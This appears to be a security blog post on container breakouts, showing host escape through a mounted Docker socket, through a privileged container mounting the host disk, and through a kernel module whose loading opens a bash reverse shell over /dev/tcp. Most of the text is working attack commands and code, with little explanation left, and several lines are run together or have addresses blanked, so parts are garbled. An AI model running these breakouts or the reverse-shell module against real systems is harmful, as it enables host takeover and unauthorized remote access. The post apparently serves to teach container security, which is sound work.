Container Security-Common issues

A) Docker unix socket mounted in container/Docker tcp socket exposed(Container Breakout-1)-

Some container monitoring and management application requires docker unix socket to be mounted inside container for their functioning(e.g portainer). We will see how an attacker can abuse these, but first we will create a vulnerable container-

netstat -a -p --unix | grep docker
docker run -it -v /run/docker.sock:/var/docker.sock --name alpine1 alpine sh
find / -name docker.sock
curl --unix-socket /var/docker.sock -H "Content-Type: application/json" \                                                                                                                                                                 
> -d '{"Image": "alpine", "Cmd": ["echo", "hello world"]}' \
> -X POST http://localhost/v1.41/containers/create
curl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/startcurl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/wait
tar -xvf docker-20.10.9.tgz
python3 -m http.server 80
curl --output docker_cli
chmod +x docker_cli
./docker_cli -H unix:///var/docker.sock run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash
/usr/sbin/dockerd -H tcp://
docker -H tcp:// run --net=host -it ubuntu sh
./docker -H tcp:// run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash

B) Privileged container or all capabilities allowed(Container breakout-2)-

If the container is started with either

--privileged OR--cap-add=all
mount /dev/sda1 /mnt
chroot /mnt bash

C) Exploiting capabilities-

Capability is a group of one or more specific privileges. There are many of these groups(capabilities). You can think of each capability/group as a group of sys calls. These allows us to give fine grained access of certain kernel features to a program or a binary. As an example /usr/bin/ping needs root access for creating a raw socket for icmp. Now for this one way is to configure sudo for ping in sudoers file, or we can set suid bit with owner of ping file as root user, or we can assign a specific capability to ping binary known as CAP_NET_RAW to be able to create and use raw socket. So rather than giving full root access we were able to further provide fine grained access in this case to ping program. More about these with respect to containers is here

ps -aux
cat /proc/1/status | grep Cap
capsh --decode=00000000a80525fb
sudo apt-get install -y build-essential linux-headers-$(uname -r)
hostname -i
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
MODULE_DESCRIPTION("LKM reverse shell module");
static char command[] = "bash -i >& /dev/tcp/ 0>&1"; //Reverse shell change ip and port if needed

char *argv[] = {
"-c", // flag make command run from option list
command, // Reverse shell
NULL // End of the list
static char *envp[] = {
NULL // End of the list

static int __init connect_back_init(void)

return call_usermodehelper(
argv[0], // execution path
argv, // arguments for process
envp, // environment for process
UMH_WAIT_EXEC // don't wait for program return status

static void __exit connect_back_exit(void)
printk(KERN_INFO "Exiting\n");

obj-m += reverseshell_module.o

make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules

make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean
chmod +x rev_module.ko; insmod rev_module.ko



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback.